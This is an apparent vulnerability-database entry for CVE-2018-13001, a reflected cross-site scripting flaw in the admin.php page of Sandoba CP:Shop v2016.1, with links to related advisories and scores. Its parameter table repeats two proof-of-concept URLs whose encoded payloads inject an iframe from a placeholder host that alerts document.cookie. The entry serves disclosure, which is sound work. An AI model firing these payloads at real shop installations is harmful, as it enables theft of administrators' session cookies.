CVE-2018-13001

🗓️ 29 Jun 2018 14:00:00Reported by mitreType

cve

cve🔗 web.nvd.nist.gov👁 36 Views🌐 WEB

XSS vulnerability in Sandoba CP:Shop v2016.

Reporter	Title	Published	Views	Family All 8
CNVD	Sandoba CP:Shop '. /cpshop/' module cross-site scripting vulnerability	2 Jul 201800:00	–	cnvd
Cvelist	CVE-2018-13001	29 Jun 201814:00	–	cvelist
EUVD	EUVD-2018-4952	7 Oct 202500:30	–	euvd
NVD	CVE-2018-13001	29 Jun 201814:29	–	nvd
OSV	CVE-2018-13001	29 Jun 201814:29	–	osv
Prion	Design/Logic Flaw	29 Jun 201814:29	–	prion
Vulnerability Lab	Sandoba CP:Shop CMS v2016.1 - Multiple XSS Vulnerabilities	2 Mar 201800:00	–	vulnerlab
Vulnerability Lab	Sandoba CP:Shop CMS v2016.1 - Multiple XSS Vulnerabilities	2 Mar 201800:00	–	vulnerlab

NVD

Node

sandoba cp::shopMatch2016.1

Source	Link
vulnerability-lab	www.vulnerability-lab.com/get_content.php

Parameter	Position	Path	Description	CWE
file	query param	cpshop/admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes	Non-persistent XSS via GET parameters in cpshop admin.php enabling injection of script into client-side context.	CWE-79
mode	query param	cpshop/admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes	Non-persistent XSS via GET parameters in cpshop admin.php enabling injection of script into client-side context.	CWE-79
form[dir]	query param	cpshop/admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes	Non-persistent XSS via GET parameters in cpshop admin.php enabling injection of script into client-side context.	CWE-79
form[path]	query param	cpshop/admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes	Non-persistent XSS via GET parameters in cpshop admin.php enabling injection of script into client-side context.	CWE-79
cleanajax	query param	cpshop/admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes	Non-persistent XSS via GET parameters in cpshop admin.php enabling injection of script into client-side context.	CWE-79
form[search]	query param	cpshop/admin.php?form%5Bsearch%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news	Non-persistent XSS via GET parameter form[search] leading to script injection in response.	CWE-79
form[var]	query param	cpshop/admin.php?form%5Bsearch%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news	Non-persistent XSS via GET parameter form[search] leading to script injection in response.	CWE-79
form[poster]	query param	cpshop/admin.php?form%5Bsearch%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news	Non-persistent XSS via GET parameter form[search] leading to script injection in response.	CWE-79
form[category]	query param	cpshop/admin.php?form%5Bsearch%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news	Non-persistent XSS via GET parameter form[search] leading to script injection in response.	CWE-79
file	query param	cpshop/admin.php?form%5Bsearch%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news	Non-persistent XSS via GET parameter form[search] leading to script injection in response.	CWE-79

21 Nov 2024 03:46Current

6Medium risk

Vulners AI Score6

CVSS 24.3

CVSS 36.1

EPSS0.00223

cve-2018-13001 xss sandoba cp:shop v2016.1 admin.php cpshop remote code injection web application security